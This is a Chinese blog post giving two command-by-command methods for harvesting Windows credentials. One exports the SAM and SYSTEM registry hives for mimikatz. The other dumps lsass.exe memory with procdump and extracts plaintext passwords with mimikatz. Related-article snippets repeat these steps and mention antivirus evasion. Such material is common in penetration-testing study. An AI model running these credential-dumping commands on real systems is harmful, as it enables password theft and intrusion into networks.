读取 Windows Hash 密码两种方式

最新推荐文章于 2023-07-23 19:20:36 发布
最新推荐文章于 2023-07-23 19:20:36 发布
阅读量899 收藏 4
点赞数 1
分类专栏: 内网安全 文章标签: windows 哈希算法 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46079186/article/details/121849354
版权

第一种

下载被攻击机的注册表到本地,使用mimikatz读取密码

  1. 管理员执行cmd
    reg save HKLM\SYSTEM C:\sys.hiv
    reg save HKLM\SAM C:\sam.hiv
    导出注册表文件
    在这里插入图片描述

  2. 下载mimikatz
    https://github.com/gentilkiwi/mimikatz/releases
    配置环境变量
    在这里插入图片描述

在这里插入图片描述

  1. 我们在c盘目录下,命令行直接执行
    mimikatz.exe
    lsadump::sam /sam:sam.hiv /system:sys.hiv
    在这里插入图片描述

第二种

procdump64+mimikatz可实现从内存中获取明文密码
命令行:tasklist # 查看进程
可以看到有一个 lsass.exe 的进程,用于本地安全和登陆策略
在这里插入图片描述
下载procdump64 工具 (路径添加到环境变量使用方面一点)

  1. procdump64.exe -accepteula -ma lsass.exe lsass.dmp # 导出lsass.exe 进程
    在这里插入图片描述
    已经下载到c 盘了
    使用mimikatz.exe 工具
  2. mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” exit

或者 直接输出到文本
mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” > pass.txt

在这里插入图片描述

~ Venus
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内存取证工具 volatility 使用说明
u014794949
03-29 4974
命令格式 volatility [plugin] -f [image] --profile=[profile] 在分析之前,需要先判断当前的镜像信息,分析出是哪个操作系统 volatility imageinfo -f file.raw 知道镜像后,就可以在 –profile 中带上对应的操作系统 常见的插件 查看当前展示的 notepad 文本 volatility notepad -f ...
内网渗透体系学习4
m0_55772907的博客
10-25 884
内网
获取windows用户密码——Jhon
qq_61861243的博客
10-06 2254
获取windows用户密码——Jhon
【hive on spark Error】return code 30041 from org.apache.hadoop.hive.ql.exec.spark.SparkTask.
01-07
ERROR : FAILED: Execution Error, return code 30041 from org.apache.hadoop.hive.ql.exec.spark.SparkTask. 前言报错信息异常分析配置改动后记 前言 在成功消除Cloudare管理界面上那些可恶的警告之后,我又对yarn的一些参数进行调优,最后重启了集群。当我提个任务(spark on yarn)并且看到并发及资源的分配情况正如自己先前所料的时候,我长舒了一口气,端起杯子拿上手机起身打算去接杯水消遣一下。 然而我一杯温水接完凑在嘴边,眼睛扫了一下手机刚打算痛饮一番的时候,同事在群里惊呼报错的消息就
Windwos密码导出的几种姿势
热门推荐
Matthew
09-14 1万+
这篇文章主要是介绍怎么在本地提取用户密码,把知识整理了一下,把知识整理起来的威力还是挺大的。以下的方式分为要免杀和不需要免杀的方式。文章介绍的技术具有一定的攻击性,主要用于学习。 要免杀: 1.Getapss Getapss是由闪电小子根据mimikatz编译的一个工具,可以获取明文密码。现在有32位和64位了,直接运行getpass.exe。 2.QuarksPwDu
Windows系统密码抓取与防护
qq_43590351的博客
09-10 1482
Windows系统密码抓取与防护 单机密码抓取与防范 LM Hash 和NTLM Hash LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用 NTLM Hash(MD4加密) 真正是用户密码的哈希值 Windows操作系统中的密码一般由两部分组成: 一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下: Username:RID:LM-Ha
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 8337
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
windows账户安全(通过mimikatz、Jhon获取用户密码)
最新发布
qq_62729556的博客
07-23 1708
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash
Mimikatz学习笔记
SWEET0SWAT的博客
02-25 2608
使用SAM和System文件抓取密码 导出sam和system文件抓取密码 reg save hklm\sam sam.hive reg save hklm\system system.hive
横向移动之windows登录账号密码导出
yy
02-16 2672
在默认情况下,当系统为win10或2012R2及以上时,默认在内存缓存中禁止保存明文密码,所以无法在 lsass.exe 进程中抓取明文密码。此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
windows实用dos命令大全
12-10
(2)PATH命令中的路径,若有两条以上,各路径之间以一个分号“;”隔开;  (3)PATH命令有三种使用方法:  PATH[盘符1:][路径1][盘符2:][路径2]…(设定可执行文件的搜索路径) PATH:(取消所有路径)  ...
JAVA上百实例源码以及开源项目
01-03
 通过网络或磁盘等方式,把公钥编码传送给李四,李四接收到张三编码后的公钥,将其解码,李四用张三的公钥加密信息,并发送给李四,张三用自己的私钥解密从李四处收到的信息…… Java利用DES私钥对称加密代码实例 ...
c# 加密和解密相关代码
09-06
string类的ToCharArray 方法用来将字符串中的字符复制到Unicode 字符数组,该方法有两种重载形式,本 实例中用到的它的重载形式如下: public char[] ToCharArray() 参数说明 返回值:元素为此字符串的各字符的...
oracle学习文档 笔记 全面 深刻 详细 通俗易懂 doc word格式 清晰 连接字符串
05-06
说明:修改用户密码一般有两种方式,一种是通过命令password修改,另一种是通过语句alter user实现,如果要修改他人的密码,必须要具有相关的权限才可以 用法: 方式一 password [用户名] 方式二 alert user 用户名...
java开源包1
06-28
缓存读取自redis的slave节点,写入到redis的master节点。 Java对象的SQL接口 JoSQL JoSQL(SQLforJavaObjects)为Java开发者提供运用SQL语句来操作Java对象集的能力.利用JoSQL可以像操作数据库中的数据一样对任何Java...
内网渗透----windows信息收集整理
浅笑996的博客
04-14 930
一、基础信息收集 1.信息收集类型 操作系统版本、内核、架构 是否在虚拟化环境中,已安装的程序、补丁 网络配置及连接 防火墙设置 用户信息、历史纪录(浏览器、登陆密码) 共享信息、敏感文件、缓存信息、服务等 2.系统信息 systeminfo 功能:心事有关计算机及其操作系统的详细配置,包括操作系统配置,安全信息,产品ID和硬件属性(如RAM,磁盘空间和网卡) Egg systeminfo ...
获取用户密码
weixin_30722589的博客
07-04 306
使用SAMInside获取用户密码 reg save hklm\sam C:/sam.hivereg save hklm\system C:/system.hive 用cain解密 或者复制sam到自己本机上然后再用 mimikatz获取登陆过的账号密码 mimikatz log privilege::debug sekurlsa::logonpasswords ...
JAVA加密算法之常见哈希算法总结
m0_60982956的博客
07-22 1242
哈希算法Hash)又称摘要算法(Digest),它的作用是对任意一组输入数据进行计算,得到一个固定长度的输出摘要。哈希算法的目的为了验证原始数据是否被篡改。哈希算法最重要的特点就是●相同的输入一定得到相同的输出;●不同的输入大概率得到不同的输出。1.使用MessageDigest时,我们首先根据哈希算法获取一个MessageDigest实例。2.反复调用update(byte[])输入数据。3.当输入结束后,调用digest()方法获得byte[]数组表示的摘要。...
【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】
AA8j的博客
07-26 468
拓扑图 Windows系统散列值获取与防范 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作。 抓取密码哈希:右键被控主机 —> Access —> Dump Hashes [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBCl8Ihj-1627176965164)(images/2021-07-20-16-09-45.png)] [外链图片转存失败,
perl %hash 声明赋值的几种方式
05-27
在 Perl 中,我们可以使用以下几种方式来声明和初始化一个哈希(hash): 1. 直接赋值法: ``` %hash = ('key1' => 'value1', 'key2' => 'value2', 'key3' => 'value3'); ``` 2. 大括号法: ``` %hash = { 'key1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值